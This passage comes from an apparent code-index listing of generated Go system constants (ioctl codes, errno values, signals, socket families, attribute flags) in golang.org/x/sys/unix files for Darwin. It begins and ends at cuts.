= 0x20007481 constant TIOCMBIC (line 1501) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1502) | TIOCMBIS = 0x8004746c constant TIOCMGDTRWAIT (line 1503) | TIOCMGDTRWAIT = 0x4004745a constant TIOCMGET (line 1504) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1505) | TIOCMODG = 0x40047403 constant TIOCMODS (line 1506) | TIOCMODS = 0x80047404 constant TIOCMSDTRWAIT (line 1507) | TIOCMSDTRWAIT = 0x8004745b constant TIOCMSET (line 1508) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1509) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1510) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1511) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1512) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1513) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1514) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1515) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1516) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1517) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1518) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1519) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1520) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1521) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1522) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1523) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1524) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1525) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1526) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1527) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1528) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1529) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1530) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1531) | TIOCPKT_STOP = 0x4 constant TIOCPTYGNAME (line 1532) | TIOCPTYGNAME = 0x40807453 constant TIOCPTYGRANT (line 1533) | TIOCPTYGRANT = 0x20007454 constant TIOCPTYUNLK (line 1534) | TIOCPTYUNLK = 0x20007452 constant TIOCREMOTE (line 1535) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1536) | TIOCSBRK = 0x2000747b constant TIOCSCONS (line 1537) | TIOCSCONS = 0x20007463 constant TIOCSCTTY (line 1538) | TIOCSCTTY = 0x20007461 constant TIOCSDRAINWAIT (line 1539) | TIOCSDRAINWAIT = 0x80047457 constant TIOCSDTR (line 1540) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1541) | TIOCSETA = 0x80487414 constant TIOCSETAF (line 1542) | TIOCSETAF = 0x80487416 constant TIOCSETAW (line 1543) | TIOCSETAW = 0x80487415 constant TIOCSETD (line 1544) | TIOCSETD = 0x8004741b constant TIOCSIG (line 1545) | TIOCSIG = 0x2000745f constant TIOCSPGRP (line 1546) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1547) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1548) | TIOCSTAT = 0x20007465 constant TIOCSTI (line 1549) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1550) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1551) | TIOCSWINSZ = 0x80087467 constant TIOCTIMESTAMP (line 1552) | TIOCTIMESTAMP = 0x40107459 constant TIOCUCNTL (line 1553) | TIOCUCNTL = 0x80047466 constant TOSTOP (line 1554) | TOSTOP = 0x400000 constant UF_APPEND (line 1555) | UF_APPEND = 0x4 constant UF_COMPRESSED (line 1556) | UF_COMPRESSED = 0x20 constant UF_DATAVAULT (line 1557) | UF_DATAVAULT = 0x80 constant UF_HIDDEN (line 1558) | UF_HIDDEN = 0x8000 constant UF_IMMUTABLE (line 1559) | UF_IMMUTABLE = 0x2 constant UF_NODUMP (line 1560) | UF_NODUMP = 0x1 constant UF_OPAQUE (line 1561) | UF_OPAQUE = 0x8 constant UF_SETTABLE (line 1562) | UF_SETTABLE = 0xffff constant UF_TRACKED (line 1563) | UF_TRACKED = 0x40 constant VDISCARD (line 1564) | VDISCARD = 0xf constant VDSUSP (line 1565) | VDSUSP = 0xb constant VEOF (line 1566) | VEOF = 0x0 constant VEOL (line 1567) | VEOL = 0x1 constant VEOL2 (line 1568) | VEOL2 = 0x2 constant VERASE (line 1569) | VERASE = 0x3 constant VINTR (line 1570) | VINTR = 0x8 constant VKILL (line 1571) | VKILL = 0x5 constant VLNEXT (line 1572) | VLNEXT = 0xe constant VMADDR_CID_ANY (line 1573) | VMADDR_CID_ANY = 0xffffffff constant VMADDR_CID_HOST (line 1574) | VMADDR_CID_HOST = 0x2 constant VMADDR_CID_HYPERVISOR (line 1575) | VMADDR_CID_HYPERVISOR = 0x0 constant VMADDR_CID_RESERVED (line 1576) | VMADDR_CID_RESERVED = 0x1 constant VMADDR_PORT_ANY (line 1577) | VMADDR_PORT_ANY = 0xffffffff constant VMIN (line 1578) | VMIN = 0x10 constant VM_LOADAVG (line 1579) | VM_LOADAVG = 0x2 constant VM_MACHFACTOR (line 1580) | VM_MACHFACTOR = 0x4 constant VM_MAXID (line 1581) | VM_MAXID = 0x6 constant VM_METER (line 1582) | VM_METER = 0x1 constant VM_SWAPUSAGE (line 1583) | VM_SWAPUSAGE = 0x5 constant VQUIT (line 1584) | VQUIT = 0x9 constant VREPRINT (line 1585) | VREPRINT = 0x6 constant VSTART (line 1586) | VSTART = 0xc constant VSTATUS (line 1587) | VSTATUS = 0x12 constant VSTOP (line 1588) | VSTOP = 0xd constant VSUSP (line 1589) | VSUSP = 0xa constant VT0 (line 1590) | VT0 = 0x0 constant VT1 (line 1591) | VT1 = 0x10000 constant VTDLY (line 1592) | VTDLY = 0x10000 constant VTIME (line 1593) | VTIME = 0x11 constant VWERASE (line 1594) | VWERASE = 0x4 constant WCONTINUED (line 1595) | WCONTINUED = 0x10 constant WCOREFLAG (line 1596) | WCOREFLAG = 0x80 constant WEXITED (line 1597) | WEXITED = 0x4 constant WNOHANG (line 1598) | WNOHANG = 0x1 constant WNOWAIT (line 1599) | WNOWAIT = 0x20 constant WORDSIZE (line 1600) | WORDSIZE = 0x40 constant WSTOPPED (line 1601) | WSTOPPED = 0x8 constant WUNTRACED (line 1602) | WUNTRACED = 0x2 constant XATTR_CREATE (line 1603) | XATTR_CREATE = 0x2 constant XATTR_NODEFAULT (line 1604) | XATTR_NODEFAULT = 0x10 constant XATTR_NOFOLLOW (line 1605) | XATTR_NOFOLLOW = 0x1 constant XATTR_NOSECURITY (line 1606) | XATTR_NOSECURITY = 0x8 constant XATTR_REPLACE (line 1607) | XATTR_REPLACE = 0x4 constant XATTR_SHOWCOMPRESSION (line 1608) | XATTR_SHOWCOMPRESSION = 0x20 constant E2BIG (line 1613) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1614) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1615) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1616) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1617) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1618) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1619) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1620) | EAUTH = syscall.Errno(0x50) constant EBADARCH (line 1621) | EBADARCH = syscall.Errno(0x56) constant EBADEXEC (line 1622) | EBADEXEC = syscall.Errno(0x55) constant EBADF (line 1623) | EBADF = syscall.Errno(0x9) constant EBADMACHO (line 1624) | EBADMACHO = syscall.Errno(0x58) constant EBADMSG (line 1625) | EBADMSG = syscall.Errno(0x5e) constant EBADRPC (line 1626) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1627) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1628) | ECANCELED = syscall.Errno(0x59) constant ECHILD (line 1629) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1630) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1631) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1632) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1633) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1634) | EDESTADDRREQ = syscall.Errno(0x27) constant EDEVERR (line 1635) | EDEVERR = syscall.Errno(0x53) constant EDOM (line 1636) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1637) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1638) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1639) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1640) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1641) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1642) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1643) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1644) | EIDRM = syscall.Errno(0x5a) constant EILSEQ (line 1645) | EILSEQ = syscall.Errno(0x5c) constant EINPROGRESS (line 1646) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1647) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1648) | EINVAL = syscall.Errno(0x16) constant EIO (line 1649) | EIO = syscall.Errno(0x5) constant EISCONN (line 1650) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1651) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1652) | ELAST = syscall.Errno(0x6a) constant ELOOP (line 1653) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1654) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1655) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1656) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1657) | EMULTIHOP = syscall.Errno(0x5f) constant ENAMETOOLONG (line 1658) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1659) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1660) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1661) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1662) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1663) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1664) | ENOATTR = syscall.Errno(0x5d) constant ENOBUFS (line 1665) | ENOBUFS = syscall.Errno(0x37) constant ENODATA (line 1666) | ENODATA = syscall.Errno(0x60) constant ENODEV (line 1667) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1668) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1669) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1670) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1671) | ENOLINK = syscall.Errno(0x61) constant ENOMEM (line 1672) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1673) | ENOMSG = syscall.Errno(0x5b) constant ENOPOLICY (line 1674) | ENOPOLICY = syscall.Errno(0x67) constant ENOPROTOOPT (line 1675) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1676) | ENOSPC = syscall.Errno(0x1c) constant ENOSR (line 1677) | ENOSR = syscall.Errno(0x62) constant ENOSTR (line 1678) | ENOSTR = syscall.Errno(0x63) constant ENOSYS (line 1679) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1680) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1681) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1682) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1683) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1684) | ENOTRECOVERABLE = syscall.Errno(0x68) constant ENOTSOCK (line 1685) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1686) | ENOTSUP = syscall.Errno(0x2d) constant ENOTTY (line 1687) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1688) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1689) | EOPNOTSUPP = syscall.Errno(0x66) constant EOVERFLOW (line 1690) | EOVERFLOW = syscall.Errno(0x54) constant EOWNERDEAD (line 1691) | EOWNERDEAD = syscall.Errno(0x69) constant EPERM (line 1692) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1693) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1694) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1695) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1696) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1697) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1698) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1699) | EPROTO = syscall.Errno(0x64) constant EPROTONOSUPPORT (line 1700) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1701) | EPROTOTYPE = syscall.Errno(0x29) constant EPWROFF (line 1702) | EPWROFF = syscall.Errno(0x52) constant EQFULL (line 1703) | EQFULL = syscall.Errno(0x6a) constant ERANGE (line 1704) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1705) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1706) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1707) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHLIBVERS (line 1708) | ESHLIBVERS = syscall.Errno(0x57) constant ESHUTDOWN (line 1709) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1710) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1711) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1712) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1713) | ESTALE = syscall.Errno(0x46) constant ETIME (line 1714) | ETIME = syscall.Errno(0x65) constant ETIMEDOUT (line 1715) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1716) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1717) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1718) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1719) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1720) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1725) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1726) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1727) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1728) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1729) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1730) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1731) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1732) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1733) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1734) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1735) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1736) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1737) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1738) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1739) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1740) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1741) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1742) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1743) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1744) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1745) | SIGTERM = syscall.Signal(0xf) constant SIGTRAP (line 1746) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1747) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1748) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1749) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1750) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1751) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1752) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1753) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1754) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1755) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1756) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_darwin_arm64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_CCITT (line 15) | AF_CCITT = 0xa constant AF_CHAOS (line 16) | AF_CHAOS = 0x5 constant AF_CNT (line 17) | AF_CNT = 0x15 constant AF_COIP (line 18) | AF_COIP = 0x14 constant AF_DATAKIT (line 19) | AF_DATAKIT = 0x9 constant AF_DECnet (line 20) | AF_DECnet = 0xc constant AF_DLI (line 21) | AF_DLI = 0xd constant AF_E164 (line 22) | AF_E164 = 0x1c constant AF_ECMA (line 23) | AF_ECMA = 0x8 constant AF_HYLINK (line 24) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 25) | AF_IEEE80211 = 0x25 constant AF_IMPLINK (line 26) | AF_IMPLINK = 0x3 constant AF_INET (line 27) | AF_INET = 0x2 constant AF_INET6 (line 28) | AF_INET6 = 0x1e constant AF_IPX (line 29) | AF_IPX = 0x17 constant AF_ISDN (line 30) | AF_ISDN = 0x1c constant AF_ISO (line 31) | AF_ISO = 0x7 constant AF_LAT (line 32) | AF_LAT = 0xe constant AF_LINK (line 33) | AF_LINK = 0x12 constant AF_LOCAL (line 34) | AF_LOCAL = 0x1 constant AF_MAX (line 35) | AF_MAX = 0x29 constant AF_NATM (line 36) | AF_NATM = 0x1f constant AF_NDRV (line 37) | AF_NDRV = 0x1b constant AF_NETBIOS (line 38) | AF_NETBIOS = 0x21 constant AF_NS (line 39) | AF_NS = 0x6 constant AF_OSI (line 40) | AF_OSI = 0x7 constant AF_PPP (line 41) | AF_PPP = 0x22 constant AF_PUP (line 42) | AF_PUP = 0x4 constant AF_RESERVED_36 (line 43) | AF_RESERVED_36 = 0x24 constant AF_ROUTE (line 44) | AF_ROUTE = 0x11 constant AF_SIP (line 45) | AF_SIP = 0x18 constant AF_SNA (line 46) | AF_SNA = 0xb constant AF_SYSTEM (line 47) | AF_SYSTEM = 0x20 constant AF_SYS_CONTROL (line 48) | AF_SYS_CONTROL = 0x2 constant AF_UNIX (line 49) | AF_UNIX = 0x1 constant AF_UNSPEC (line 50) | AF_UNSPEC = 0x0 constant AF_UTUN (line 51) | AF_UTUN = 0x26 constant AF_VSOCK (line 52) | AF_VSOCK = 0x28 constant ALTWERASE (line 53) | ALTWERASE = 0x200 constant ATTR_BIT_MAP_COUNT (line 54) | ATTR_BIT_MAP_COUNT = 0x5 constant ATTR_CMN_ACCESSMASK (line 55) | ATTR_CMN_ACCESSMASK = 0x20000 constant ATTR_CMN_ACCTIME (line 56) | ATTR_CMN_ACCTIME = 0x1000 constant ATTR_CMN_ADDEDTIME (line 57) | ATTR_CMN_ADDEDTIME = 0x10000000 constant ATTR_CMN_BKUPTIME (line 58) | ATTR_CMN_BKUPTIME = 0x2000 constant ATTR_CMN_CHGTIME (line 59) | ATTR_CMN_CHGTIME = 0x800 constant ATTR_CMN_CRTIME (line 60) | ATTR_CMN_CRTIME = 0x200 constant ATTR_CMN_DATA_PROTECT_FLAGS (line 61) | ATTR_CMN_DATA_PROTECT_FLAGS = 0x40000000 constant ATTR_CMN_DEVID (line 62) | ATTR_CMN_DEVID = 0x2 constant ATTR_CMN_DOCUMENT_ID (line 63) | ATTR_CMN_DOCUMENT_ID = 0x100000 constant ATTR_CMN_ERROR (line 64) | ATTR_CMN_ERROR = 0x20000000 constant ATTR_CMN_EXTENDED_SECURITY (line 65) | ATTR_CMN_EXTENDED_SECURITY = 0x400000 constant ATTR_CMN_FILEID (line 66) | ATTR_CMN_FILEID = 0x2000000 constant ATTR_CMN_FLAGS (line 67) | ATTR_CMN_FLAGS = 0x40000 constant ATTR_CMN_FNDRINFO (line 68) | ATTR_CMN_FNDRINFO = 0x4000 constant ATTR_CMN_FSID (line 69) | ATTR_CMN_FSID = 0x4 constant ATTR_CMN_FULLPATH (line 70) | ATTR_CMN_FULLPATH = 0x8000000 constant ATTR_CMN_GEN_COUNT (line 71) | ATTR_CMN_GEN_COUNT = 0x80000 constant ATTR_CMN_GRPID (line 72) | ATTR_CMN_GRPID = 0x10000 constant ATTR_CMN_GRPUUID (line 73) | ATTR_CMN_GRPUUID = 0x1000000 constant ATTR_CMN_MODTIME (line 74) | ATTR_CMN_MODTIME = 0x400 constant ATTR_CMN_NAME (line 75) | ATTR_CMN_NAME = 0x1 constant ATTR_CMN_NAMEDATTRCOUNT (line 76) | ATTR_CMN_NAMEDATTRCOUNT = 0x80000 constant ATTR_CMN_NAMEDATTRLIST (line 77) | ATTR_CMN_NAMEDATTRLIST = 0x100000 constant ATTR_CMN_OBJID (line 78) | ATTR_CMN_OBJID = 0x20 constant ATTR_CMN_OBJPERMANENTID (line 79) | ATTR_CMN_OBJPERMANENTID = 0x40 constant ATTR_CMN_OBJTAG (line 80) | ATTR_CMN_OBJTAG = 0x10 constant ATTR_CMN_OBJTYPE (line 81) | ATTR_CMN_OBJTYPE = 0x8 constant ATTR_CMN_OWNERID (line 82) | ATTR_CMN_OWNERID = 0x8000 constant ATTR_CMN_PARENTID (line 83) | ATTR_CMN_PARENTID = 0x4000000 constant ATTR_CMN_PAROBJID (line 84) | ATTR_CMN_PAROBJID = 0x80 constant ATTR_CMN_RETURNED_ATTRS (line 85) | ATTR_CMN_RETURNED_ATTRS = 0x80000000 constant ATTR_CMN_SCRIPT (line 86) | ATTR_CMN_SCRIPT = 0x100 constant ATTR_CMN_SETMASK (line 87) | ATTR_CMN_SETMASK = 0x51c7ff00 constant ATTR_CMN_USERACCESS (line 88) | ATTR_CMN_USERACCESS = 0x200000 constant ATTR_CMN_UUID (line 89) | ATTR_CMN_UUID = 0x800000 constant ATTR_CMN_VALIDMASK (line 90) | ATTR_CMN_VALIDMASK = 0xffffffff constant ATTR_CMN_VOLSETMASK (line 91) | ATTR_CMN_VOLSETMASK = 0x6700 constant ATTR_FILE_ALLOCSIZE (line 92) | ATTR_FILE_ALLOCSIZE = 0x4 constant ATTR_FILE_CLUMPSIZE (line 93) | ATTR_FILE_CLUMPSIZE = 0x10 constant ATTR_FILE_DATAALLOCSIZE (line 94) | ATTR_FILE_DATAALLOCSIZE = 0x400 constant ATTR_FILE_DATAEXTENTS (line 95) | ATTR_FILE_DATAEXTENTS = 0x800 constant ATTR_FILE_DATALENGTH (line 96) | ATTR_FILE_DATALENGTH = 0x200 constant ATTR_FILE_DEVTYPE (line 97) | ATTR_FILE_DEVTYPE = 0x20 constant ATTR_FILE_FILETYPE (line 98) | ATTR_FILE_FILETYPE = 0x40 constant ATTR_FILE_FORKCOUNT (line 99) | ATTR_FILE_FORKCOUNT = 0x80 constant ATTR_FILE_FORKLIST (line 100) | ATTR_FILE_FORKLIST = 0x100 constant ATTR_FILE_IOBLOCKSIZE (line 101) | ATTR_FILE_IOBLOCKSIZE = 0x8 constant ATTR_FILE_LINKCOUNT (line 102) | ATTR_FILE_LINKCOUNT = 0x1 constant ATTR_FILE_RSRCALLOCSIZE (line 103) | ATTR_FILE_RSRCALLOCSIZE = 0x2000 constant ATTR_FILE_RSRCEXTENTS (line 104) | ATTR_FILE_RSRCEXTENTS = 0x4000 constant ATTR_FILE_RSRCLENGTH (line 105) | ATTR_FILE_RSRCLENGTH = 0x1000 constant ATTR_FILE_SETMASK (line 106) | ATTR_FILE_SETMASK = 0x20 constant ATTR_FILE_TOTALSIZE (line 107) | ATTR_FILE_TOTALSIZE = 0x2 constant ATTR_FILE_VALIDMASK (line 108) | ATTR_FILE_VALIDMASK = 0x37ff constant ATTR_VOL_ALLOCATIONCLUMP (line 109) | ATTR_VOL_ALLOCATIONCLUMP = 0x40 constant ATTR_VOL_ATTRIBUTES (line 110) | ATTR_VOL_ATTRIBUTES = 0x40000000 constant ATTR_VOL_CAPABILITIES (line 111) | ATTR_VOL_CAPABILITIES = 0x20000 constant ATTR_VOL_DIRCOUNT (line 112) | ATTR_VOL_DIRCOUNT = 0x400 constant ATTR_VOL_ENCODINGSUSED (line 113) | ATTR_VOL_ENCODINGSUSED = 0x10000 constant ATTR_VOL_FILECOUNT (line 114) | ATTR_VOL_FILECOUNT = 0x200 constant ATTR_VOL_FSTYPE (line 115) | ATTR_VOL_FSTYPE = 0x1 constant ATTR_VOL_INFO (line 116) | ATTR_VOL_INFO = 0x80000000 constant ATTR_VOL_IOBLOCKSIZE (line 117) | ATTR_VOL_IOBLOCKSIZE = 0x80 constant ATTR_VOL_MAXOBJCOUNT (line 118) | ATTR_VOL_MAXOBJCOUNT = 0x800 constant ATTR_VOL_MINALLOCATION (line 119) | ATTR_VOL_MINALLOCATION = 0x20 constant ATTR_VOL_MOUNTEDDEVICE (line 120) | ATTR_VOL_MOUNTEDDEVICE = 0x8000 constant ATTR_VOL_MOUNTFLAGS (line 121) | ATTR_VOL_MOUNTFLAGS = 0x4000 constant ATTR_VOL_MOUNTPOINT (line 122) | ATTR_VOL_MOUNTPOINT = 0x1000 constant ATTR_VOL_NAME (line 123) | ATTR_VOL_NAME = 0x2000 constant ATTR_VOL_OBJCOUNT (line 124) | ATTR_VOL_OBJCOUNT = 0x100 constant ATTR_VOL_QUOTA_SIZE (line 125) | ATTR_VOL_QUOTA_SIZE = 0x10000000 constant ATTR_VOL_RESERVED_SIZE (line 126) | ATTR_VOL_RESERVED_SIZE = 0x20000000 constant ATTR_VOL_SETMASK (line 127) | ATTR_VOL_SETMASK = 0x80002000 constant ATTR_VOL_SIGNATURE (line 128) | ATTR_VOL_SIGNATURE = 0x2 constant ATTR_VOL_SIZE (line 129) | ATTR_VOL_SIZE = 0x4 constant ATTR_VOL_SPACEAVAIL (line 130) | ATTR_VOL_SPACEAVAIL = 0x10 constant ATTR_VOL_SPACEFREE (line 131) | ATTR_VOL_SPACEFREE = 0x8 constant ATTR_VOL_SPACEUSED (line 132) | ATTR_VOL_SPACEUSED = 0x800000 constant ATTR_VOL_UUID (line 133) | ATTR_VOL_UUID = 0x40000 constant ATTR_VOL_VALIDMASK (line 134) | ATTR_VOL_VALIDMASK = 0xf087ffff constant B0 (line 135) | B0 = 0x0 constant B110 (line 136) | B110 = 0x6e constant B115200 (line 137) | B115200 = 0x1c200 constant B1200 (line 138) | B1200 = 0x4b0 constant B134 (line 139) | B134 = 0x86 constant B14400 (line 140) | B14400 = 0x3840 constant B150 (line 141) | B150 = 0x96 constant B1800 (line 142) | B1800 = 0x708 constant B19200 (line 143) | B19200 = 0x4b00 constant B200 (line 144) | B200 = 0xc8 constant B230400 (line 145) | B230400 = 0x38400 constant B2400 (line 146) | B2400 = 0x960 constant B28800 (line 147) | B28800 = 0x7080 constant B300 (line 148) | B300 = 0x12c constant B38400 (line 149) | B38400 = 0x9600 constant B4800 (line 150) | B4800 = 0x12c0 constant B50 (line 151) | B50 = 0x32 constant B57600 (line 152) | B57600 = 0xe100 constant B600 (line 153) | B600 = 0x258 constant B7200 (line 154) | B7200 = 0x1c20 constant B75 (line 155) | B75 = 0x4b constant B76800 (line 156) | B76800 = 0x12c00 constant B9600 (line 157) | B9600 = 0x2580 constant BIOCFLUSH (line 158) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 159) | BIOCGBLEN = 0x40044266 constant BIOCGDLT (line 160) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 161) | BIOCGDLTLIST = 0xc00c4279 constant BIOCGETIF (line 162) | BIOCGETIF = 0x4020426b constant BIOCGHDRCMPLT (line 163) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 164) | BIOCGRSIG = 0x40044272 constant BIOCGRTIMEOUT (line 165) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSEESENT (line 166) | BIOCGSEESENT = 0x40044276 constant BIOCGSTATS (line 167) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 168) | BIOCIMMEDIATE = 0x80044270 constant BIOCPROMISC (line 169) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 170) | BIOCSBLEN = 0xc0044266 constant BIOCSDLT (line 171) | BIOCSDLT = 0x80044278 constant BIOCSETF (line 172) | BIOCSETF = 0x80104267 constant BIOCSETFNR (line 173) | BIOCSETFNR = 0x8010427e constant BIOCSETIF (line 174) | BIOCSETIF = 0x8020426c constant BIOCSHDRCMPLT (line 175) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 176) | BIOCSRSIG = 0x80044273 constant BIOCSRTIMEOUT (line 177) | BIOCSRTIMEOUT = 0x8010426d constant BIOCSSEESENT (line 178) | BIOCSSEESENT = 0x80044277 constant BIOCVERSION (line 179) | BIOCVERSION = 0x40044271 constant BPF_A (line 180) | BPF_A = 0x10 constant BPF_ABS (line 181) | BPF_ABS = 0x20 constant BPF_ADD (line 182) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 183) | BPF_ALIGNMENT = 0x4 constant 